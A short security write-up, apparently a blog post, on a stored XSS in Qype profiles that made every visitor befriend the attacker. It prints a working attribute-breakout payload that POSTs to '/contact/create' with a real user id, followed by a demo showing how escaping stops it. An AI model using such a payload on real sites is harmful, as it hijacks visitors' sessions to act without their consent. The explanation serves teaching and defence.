Found a stored XSS on Qype: a user was able to inject JavaScript into his own profile so that every visitor who viewed that profile page automatically became his friend. The injected script runs in the visitor's browser, in the Qype origin and with the visitor's session cookie, so the friend request is sent as the visitor. Since Qype is implemented in Rails, Prototype is already loaded on every page, which made writing a fitting exploit pretty easy:
```html
"><script>new Ajax.Request('/contact/create?to_user_id=16992', {method: 'post'})</script>
```

The leading `">` closes the attribute the profile field is rendered into, and the rest becomes a real `<script>` element that POSTs to `/contact/create` on behalf of whoever loads the page. A CSRF token on that endpoint would not help here: the script runs same-origin and could simply read the token from the page. The fix is output escaping of the profile field (`h()` in Rails 2-era ERB; Rails 3 and later escape by default).
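To make the attribute breakout concrete, here is an added example (not Qype's code, and not from the original post) that renders the quoted payload into an assumed `<input value="...">` profile template both unescaped and escaped, then tokenizes the result to see which elements the browser would actually create. The template shape and the `renderProfile*` helpers are assumptions for illustration; only the payload string is taken from the post.

```javascript
// Payload quoted from the post; to_user_id is the attacker's own profile id.
const PAYLOAD = `"><script>new Ajax.Request('/contact/create?to_user_id=16992', {method: 'post'})</script>`;

// Vulnerable rendering (assumed template): raw interpolation, the equivalent of
// <%= user.name %> in Rails 2 ERB without the h() helper.
function renderProfileUnsafe(name) {
  return `<input type="text" name="name" value="${name}">`;
}

// HTML escaping for the characters that matter in text and attribute contexts,
// the same set Rails' h() / ERB::Util.html_escape rewrites.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: the payload stays inside the attribute value.
function renderProfileSafe(name) {
  return `<input type="text" name="name" value="${escapeHtml(name)}">`;
}

// Minimal tag scanner: walks the markup, honours quoted attribute values so a
// '>' inside quotes does not end a tag, and returns the element names that a
// parser would instantiate (closing tags included). Enough to show whether the
// injected <script> became a real element or stayed harmless attribute text.
function elementNames(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    if (html[j] === '/') j++;
    let name = '';
    while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
    if (!name) { i++; continue; }          // a stray '<' in text, not a tag
    let quote = null;
    while (j < html.length) {              // skip attributes up to the closing '>'
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
      j++;
    }
    names.push(name.toLowerCase());
    i = j + 1;
  }
  return names;
}

// Convenience check: does rendering `name` with `render` produce a <script> element?
function createsScriptElement(render, name) {
  return elementNames(render(name)).includes('script');
}

console.log('unsafe:', elementNames(renderProfileUnsafe(PAYLOAD)));   // input, script, script
console.log('safe:  ', elementNames(renderProfileSafe(PAYLOAD)));     // input only
```

Running it shows the unescaped template yielding `input, script, script` (the attacker's script tag and its closing tag become real elements), while the escaped one yields only `input`. Note that escaping is context-specific: this covers HTML text and double-quoted attribute values; a value placed inside a JavaScript block or a URL needs the escaping for that context instead.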